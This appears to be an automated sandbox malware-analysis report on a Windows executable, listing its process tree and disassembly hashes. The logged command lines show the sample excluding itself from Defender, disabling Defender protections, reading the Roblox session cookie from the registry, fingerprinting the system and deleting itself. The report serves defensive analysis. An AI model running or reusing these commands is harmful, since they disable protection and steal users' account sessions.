                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:14
                                            Start time:08:58:03
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe'
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:15
                                            Start time:08:58:03
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:17
                                            Start time:08:58:06
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff7fb730000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:18
                                            Start time:08:58:10
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:19
                                            Start time:08:58:10
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:20
                                            Start time:08:58:13
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:21
                                            Start time:08:58:13
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:23
                                            Start time:10:27:11
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:24
                                            Start time:10:27:12
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:25
                                            Start time:10:27:26
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                            Wow64 process (32bit):false
                                            Commandline:"wmic.exe" os get Caption
                                            Imagebase:0x7ff695ee0000
                                            File size:576'000 bytes
                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:26
                                            Start time:10:27:26
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:27
                                            Start time:10:27:26
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                            Wow64 process (32bit):false
                                            Commandline:"wmic.exe" computersystem get totalphysicalmemory
                                            Imagebase:0x7ff695ee0000
                                            File size:576'000 bytes
                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:28
                                            Start time:10:27:26
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:29
                                            Start time:10:27:27
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                            Wow64 process (32bit):false
                                            Commandline:"wmic.exe" csproduct get uuid
                                            Imagebase:0x7ff695ee0000
                                            File size:576'000 bytes
                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:30
                                            Start time:10:27:27
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:31
                                            Start time:10:27:28
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:32
                                            Start time:10:27:28
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:34
                                            Start time:10:27:44
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                            Wow64 process (32bit):false
                                            Commandline:"wmic" path win32_VideoController get name
                                            Imagebase:0x7ff695ee0000
                                            File size:576'000 bytes
                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:35
                                            Start time:10:27:44
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:36
                                            Start time:10:27:47
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\IDLBk4XMUa.exe" && pause
                                            Imagebase:0x7ff7b84d0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Target ID:37
                                            Start time:10:27:47
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Target ID:38
                                            Start time:10:27:47
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\PING.EXE
                                            Wow64 process (32bit):false
                                            Commandline:ping localhost
                                            Imagebase:0x7ff70b7d0000
                                            File size:22'528 bytes
                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true


                                              Execution Graph

                                              Execution Coverage:18.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:100%
                                              Total number of Nodes:3
                                              Total number of Limit Nodes:0
                                              execution_graph: 7ffaacea3743 -> 7ffaacea3756 (CryptUnprotectData) -> 7ffaacea3853
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: =G_H$IG_H$cG_H
                                              • API String ID: 0-594012420
                                              • Opcode ID: 653acb65fcc28909a204c54c3d65083e37356d4f38eeefb23b49861ecb546bfd
                                              • Instruction ID: db0ccc78df2947ed69a77a44050b10107f995c9c4949bb150581ab4a60f47523
                                              • Opcode Fuzzy Hash: 653acb65fcc28909a204c54c3d65083e37356d4f38eeefb23b49861ecb546bfd
                                              • Instruction Fuzzy Hash: 5F534E7061DB458FE7A8DB18C495BAAB3E1FF99304F10856DD09EC7291DE34E846CB82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1916604695.00007FFAACEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACEA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacea0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A
                                              • API String ID: 0-3554254475
                                              • Opcode ID: 0df5d71127432ab57e204b326e6254ed21145903440f9c1e1a83f9e978169f79
                                              • Instruction ID: 8566f44ac4dc7ef900990038cdfa2a777508e53c9e96f3664291b84520d5ed16
                                              • Opcode Fuzzy Hash: 0df5d71127432ab57e204b326e6254ed21145903440f9c1e1a83f9e978169f79
                                              • Instruction Fuzzy Hash: 6D33D47191D7C58FE339DB2484426A57BE0EF97705F1485BEC48ECB193DA38A80AC792

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph: basic blocks 7ffaaccedf5f-7ffaaccee9fd (rendered graph; node/edge list omitted). Calls: 7ffaacce8a28, 7ffaacce88f0, 7ffaaccee072, 7ffaacce77f0, 7ffaacce0408, 7ffaacce8a50, 7ffaaccee9fe, 7ffaacceea51, 7ffaacceeaa4, 7ffaacceeaf7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8M%$8M%
                                              • API String ID: 0-2363288293
                                              • Opcode ID: e29be12a58054d71723dccb697db93177e6f3a9b02b256eb4156d76ef89bba69
                                              • Instruction ID: face8cc57321d2a840b4ebf1c895ba86b14fcce1c3bbec7f5c82c038ab2c303f
                                              • Opcode Fuzzy Hash: e29be12a58054d71723dccb697db93177e6f3a9b02b256eb4156d76ef89bba69
                                              • Instruction Fuzzy Hash: B872A270A1DA898FEB45EF28C450BA57BE1EF5A340F1442EAE01DC72D3CE68E845C791

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph: basic blocks 7ffaaccf9390-7ffaaccfb673 (rendered graph; node/edge list omitted). Calls: 7ffaacce77e0, 7ffaacce0408, 7ffaaccfb674, 7ffaaccfb6cb, 7ffaaccf5690, 7ffaaccf6cc0, 7ffaacce1e60, 7ffaacce1800, 7ffaaccf3288, 7ffaaccf16b0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8M%$qU_H
                                              • API String ID: 0-905428570
                                              • Opcode ID: 7cb048c9b37bccfecff02d9e1c041b1cbec2a7da8d6d4f7025cf770b69349d29
                                              • Instruction ID: 1d5e3092abad52e97cc7235599e822f975ceee6e12d5d449bd3bfe4987c23fd9
                                              • Opcode Fuzzy Hash: 7cb048c9b37bccfecff02d9e1c041b1cbec2a7da8d6d4f7025cf770b69349d29
                                              • Instruction Fuzzy Hash: 81120671A19B4A8FEB89DF28846567977E1EF5A304F1481BAD00EC7293DE34E846C7C1

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8M%
                                              • API String ID: 0-1690249272
                                              • Opcode ID: 6a756d8d003ef9229dbef8678b1ed11d1a01980a00dc26030953aa88ef20166c
                                              • Instruction ID: 35c1c1e357c2dbc81bc79be569fae2be41f69d63de8456b905e49a319b078838
                                              • Opcode Fuzzy Hash: 6a756d8d003ef9229dbef8678b1ed11d1a01980a00dc26030953aa88ef20166c
                                              • Instruction Fuzzy Hash: 0872D471A19B4A8FEB84EF28C454AA977E1FF99304F1485A9D41DC7296CE34EC46CBC0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8M%
                                              • API String ID: 0-1690249272
                                              • Opcode ID: 82b6066c5aadb7cee5787b1278792a04c7f33f1c0839315d866ac255c4df92e0
                                              • Instruction ID: fcf5300cdd3fc11c8ae696d8729dced64e73a16b3838568dee1b7f65c0f76fd2
                                              • Opcode Fuzzy Hash: 82b6066c5aadb7cee5787b1278792a04c7f33f1c0839315d866ac255c4df92e0
                                              • Instruction Fuzzy Hash: D302C271A19B4A8FEB89DF28846467577E2FF9A304F1481AAD01EC72D2DE34E845C7C1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1916604695.00007FFAACEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACEA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacea0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a369117f643c614c4cecb418782ce78954e60915e73ca2b33f6c35689e1d192b
                                              • Instruction ID: 4d2ee26439a03883acd9657fd9774ef545341d07e861dbc7981fa4f9df99253b
                                              • Opcode Fuzzy Hash: a369117f643c614c4cecb418782ce78954e60915e73ca2b33f6c35689e1d192b
                                              • Instruction Fuzzy Hash: 4EB2C5B1A1DB858FEB5D9B3884656707BE1EF5A300B1880FAD01ECB6D3DD24DC498792
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8b37e6fdad76b8ffe89b5678c33fead53579391535762ebd4262bb8a344d06bc
                                              • Instruction ID: c1a1474e690415431e215663ac98deeeb3add880f84ebcb339cda90f8a5d9773
                                              • Opcode Fuzzy Hash: 8b37e6fdad76b8ffe89b5678c33fead53579391535762ebd4262bb8a344d06bc
                                              • Instruction Fuzzy Hash: A2A26F7071DA498FE7A8DB18C485BA6B7E1FFA9304F10856DD09EC7291DF34E8458B82
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1916604695.00007FFAACEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACEA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacea0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4d9fe05d70571b3080d87856d0e0d0d6b5cd5c0a4e46509ba5169b5c149b268d
                                              • Instruction ID: 4ae7cead65b0f3c4da1b582d116de8a0850ad9d2339b151eff47908ed9c33bb8
                                              • Opcode Fuzzy Hash: 4d9fe05d70571b3080d87856d0e0d0d6b5cd5c0a4e46509ba5169b5c149b268d
                                              • Instruction Fuzzy Hash: BAA2A470919A4ACFEB98EF28C455AA973F1FF59300F5085A9D41EC7296CF35E846CB80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b63206dee2a805601527b0ad67d207a3a715a0e58734e81f77f23ae2b57b8e9
                                              • Instruction ID: c0486dc36cd7f476e69241f01dec1ecff8a03b2891a7e99d98d61a3cd984d6f0
                                              • Opcode Fuzzy Hash: 3b63206dee2a805601527b0ad67d207a3a715a0e58734e81f77f23ae2b57b8e9
                                              • Instruction Fuzzy Hash: 3B329170618E06CFEB98EB18C085A75B3E1FFA9304B5585ADD06EC3696DF24F846C781
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c741dfae2cc712f80ce8c8e661fcd8942ada60112de4937389c2c8a0bc65100
                                              • Instruction ID: b7a6b6fc2e4f823d07f0f27b1738a3237201a534b388a775e94d70120525767d
                                              • Opcode Fuzzy Hash: 5c741dfae2cc712f80ce8c8e661fcd8942ada60112de4937389c2c8a0bc65100
                                              • Instruction Fuzzy Hash: 5012D271B1DA458BF798AB28945667573D1EF9A300F44817DE05EC72C2DF28F80A87C2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1916604695.00007FFAACEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACEA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacea0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3b5898d0e2d4114e04a64cfd15ef08af60abe711407db4faa9b8239ada3dae9
                                              • Instruction ID: f21e27b0c3934b96b5360a7cc4f31d49744bd2aa76be30816708835e14c5a42d
                                              • Opcode Fuzzy Hash: a3b5898d0e2d4114e04a64cfd15ef08af60abe711407db4faa9b8239ada3dae9
                                              • Instruction Fuzzy Hash: 0722C371A19A4D8FDF98EF28C4556B977E2FF99300F1081A9D01ED7296DE34E846C780
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1916604695.00007FFAACEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACEA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacea0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 754e8a02f1f67fa9f1a89f2037b42fd86e5cbd25ad9db0139f857994a7edc51e
                                              • Instruction ID: 115add6b3695f69e054fabb665f3dc5ed3d8a887e4b44d7e18bab02da0bb05f4
                                              • Opcode Fuzzy Hash: 754e8a02f1f67fa9f1a89f2037b42fd86e5cbd25ad9db0139f857994a7edc51e
                                              • Instruction Fuzzy Hash: 19124A71A0DA898FEB55EB3888156F97BE1EF87311F0440BAD05DD72D3DD28A81AC781
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f8a963f5f54236f4244f9c2a7b5401fc565d041d626147ccad0e85e2e98dcfc
                                              • Instruction ID: cf77c48b08d6e14dd0d00b653e664cb078e7dcddad541e3f62e03c39b3e7dfc3
                                              • Opcode Fuzzy Hash: 7f8a963f5f54236f4244f9c2a7b5401fc565d041d626147ccad0e85e2e98dcfc
                                              • Instruction Fuzzy Hash: A4223D70A19A098FEF98DB18C499BB9B7E1EF59300F5085B9D45EC3291DF34E885CB81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1916604695.00007FFAACEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACEA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacea0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1db0e13caa62f24064b4a44fe191c9d2b4b92f6fe8616f20f1284604b8cf3a2
                                              • Instruction ID: c861db93fe4dd092f400bbc332025c9b835d075a97e1967ad9389b870d897f5c
                                              • Opcode Fuzzy Hash: b1db0e13caa62f24064b4a44fe191c9d2b4b92f6fe8616f20f1284604b8cf3a2
                                              • Instruction Fuzzy Hash: C7E1D4B1A19A598FF7A8EB2C94556B877D1EF89310F04C1BAD40ED32D3CE28E84587C1

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0p%$I_L$t%
                                              • API String ID: 0-4271908741
                                              • Opcode ID: 918597941ea00225b53c6ef76348e64e81161343656763b903f534c0ea55b1ca
                                              • Instruction ID: 89880f1500d939bc2653ee9285c76d5a93a72b9ffbaef09fa2b77b486f66f53a
                                              • Opcode Fuzzy Hash: 918597941ea00225b53c6ef76348e64e81161343656763b903f534c0ea55b1ca
                                              • Instruction Fuzzy Hash: CDF14661B1DA4A9FE7D8E72C98597B537C1EF9A310B4441BAD40EC7293DE18ED0983C1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: aK_H
                                              • API String ID: 0-2603984226
                                              • Opcode ID: 67909e24468d87715f97d30717921df7fe56a790f34e142401a7e9315b87adfd
                                              • Instruction ID: d5dd08e043fff8400ddeac5c5c6840dd75c2b494b26d0b940668b33b5f04eb53
                                              • Opcode Fuzzy Hash: 67909e24468d87715f97d30717921df7fe56a790f34e142401a7e9315b87adfd
                                              • Instruction Fuzzy Hash: 19232D70608A4A8FEB85EF28C494BA977E1FF5A340F1445B9D41DCB297DE34E886CB41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H
                                              • API String ID: 0-2852464175
                                              • Opcode ID: a9d0fdd070de85871586f8e8f4957f12d86e07eecc4db63be524fdbc11eb336d
                                              • Instruction ID: 60ca01f40a24005db7d3213fbe4c20b606c9a7817cb89c45573ff144395a1e49
                                              • Opcode Fuzzy Hash: a9d0fdd070de85871586f8e8f4957f12d86e07eecc4db63be524fdbc11eb336d
                                              • Instruction Fuzzy Hash: 4BE27070A18A4A8FEB85EF28C495BA9B7E1FF5A300F5481B9D01DC7296DF34E845C781

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4K_H$8M%
                                              • API String ID: 0-2786014324
                                              • Opcode ID: 9bdb2f20444cf31421ff5abb8316034f2f4db97711bc43aa838b8a30e71d328d
                                              • Instruction ID: ebcd855b891511163f14a1a0a2d4516dced91a88a2cd438740c07ce8f575618a
                                              • Opcode Fuzzy Hash: 9bdb2f20444cf31421ff5abb8316034f2f4db97711bc43aa838b8a30e71d328d
                                              • Instruction Fuzzy Hash: 35027370A19B4A8FEB88DF18C494AA973E1FF59704F5085A9D41EC7296DF34EC46CB80

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 1$m
                                              • API String ID: 0-402893558
                                              • Opcode ID: 1ef539cafb5ace20d5a87d0d698d63df8a7f865b18b6467620aee317c17fbdf9
                                              • Instruction ID: 65bcc851f9bad4a6e0b68c4fc8143cfae127fa2ea8a0998d774ebd86983068df
